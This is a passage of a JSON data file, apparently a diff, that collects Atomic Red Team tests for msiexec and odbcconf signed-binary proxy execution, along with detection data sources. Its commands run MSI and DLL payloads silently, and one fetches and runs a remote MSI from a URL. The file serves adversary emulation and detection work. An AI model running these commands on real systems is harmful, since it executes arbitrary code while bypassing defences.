The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "i" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /q /#{action} \"#{msi_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute Local MSI file with an embedded EXE", + "auto_generated_guid": "ed3fa08a-ca18-4009-973e-03d13014d0e8", + "description": "Executes an MSI containing an embedded EXE using msiexec.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: i (install), a (admin), j (advertise). 
The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "i" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /q /#{action} \"#{msi_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "WMI Win32_Product Class - Execute Local MSI file with embedded JScript", + "auto_generated_guid": "882082f0-27c6-4eec-a43c-9aa80bccdb30", + "description": "Executes an MSI containing embedded JScript code using the WMI Win32_Product class\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_JScript.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: Install, Admin, Advertise. 
The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "Install" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "name": "powershell" + } + }, + { + "name": "WMI Win32_Product Class - Execute Local MSI file with embedded VBScript", + "auto_generated_guid": "cf470d9a-58e7-43e5-b0d2-805dffc05576", + "description": "Executes an MSI containing embedded VBScript code using the WMI Win32_Product class\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_VBScript.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: Install, Admin, Advertise. 
The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "Install" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "name": "powershell" + } + }, + { + "name": "WMI Win32_Product Class - Execute Local MSI file with an embedded DLL", + "auto_generated_guid": "32eb3861-30da-4993-897a-42737152f5f8", + "description": "Executes an MSI containing an embedded DLL using the WMI Win32_Product class\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_DLL.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: Install, Admin, Advertise. 
The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "Install" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "name": "powershell" + } + }, + { + "name": "WMI Win32_Product Class - Execute Local MSI file with an embedded EXE", + "auto_generated_guid": "55080eb0-49ae-4f55-a440-4167b7974f79", + "description": "Executes an MSI containing an embedded EXE using the WMI Win32_Product class\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\T1218.007_EXE.msi" + }, + "action": { + "description": "Specifies the MSI action to perform: Install, Admin, Advertise. 
The included MSI is designed to support all three action types.\n", + "type": "String", + "default": "Install" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", + "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }\n", + "name": "powershell" + } + }, + { + "name": "Msiexec.exe - Execute the DllRegisterServer function of a DLL", + "auto_generated_guid": "0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d", + "description": "Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the \"src\" folder is only built for 64-bit, so this won't work on a 32-bit OS.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_payload": { + "description": "DLL to execute that has an implemented DllRegisterServer function", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The DLL must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /y \"#{dll_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute the DllUnregisterServer function of a DLL", + "auto_generated_guid": "ab09ec85-4955-4f9c-b8e0-6851baf4d47f", + "description": "Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. 
Note: the DLL included in the \"src\" folder is only built for 64-bit, so this won't work on a 32-bit OS.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_payload": { + "description": "DLL to execute that has an implemented DllUnregisterServer function", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.007\\src\\MSIRunner.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The DLL must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host \"You must provide your own MSI\"\n" + } + ], + "executor": { + "command": "msiexec.exe /z \"#{dll_payload}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Msiexec.exe - Execute Remote MSI file", + "auto_generated_guid": "44a4bedf-ffe3-452e-bee4-6925ab125662", + "description": "Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. 
The MSI executes a built-in JScript payload that launches powershell.exe.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "msi_payload": { + "description": "MSI file to execute", + "type": "String", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi" + } + }, + "executor": { + "command": "msiexec.exe /q /i \"#{msi_payload}\"\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) 
format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1218.008", + "command_list": [ + "odbcconf.exe /S /A {REGSVR \"PathToAtomicsFolder\\T1218.008\\src\\Win32\\T1218-2.dll\"}\n" + ], + "commands": [ + { + "command": "odbcconf.exe /S /A {REGSVR \"PathToAtomicsFolder\\T1218.008\\src\\Win32\\T1218-2.dll\"}\n", + "source": "atomics/T1218.008/T1218.008.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Odbcconf" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.008", + "display_name": "Signed Binary Proxy Execution: Odbcconf", + "atomic_tests": [ + { + "name": "Odbcconf.exe - Execute Arbitrary DLL", + "auto_generated_guid": "2430498b-06c0-4b92-a448-8ad263c388e2", + "description": "Execute arbitrary DLL file stored locally.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_payload": { + "description": "DLL to execute", + "type": "Path", + "default": 
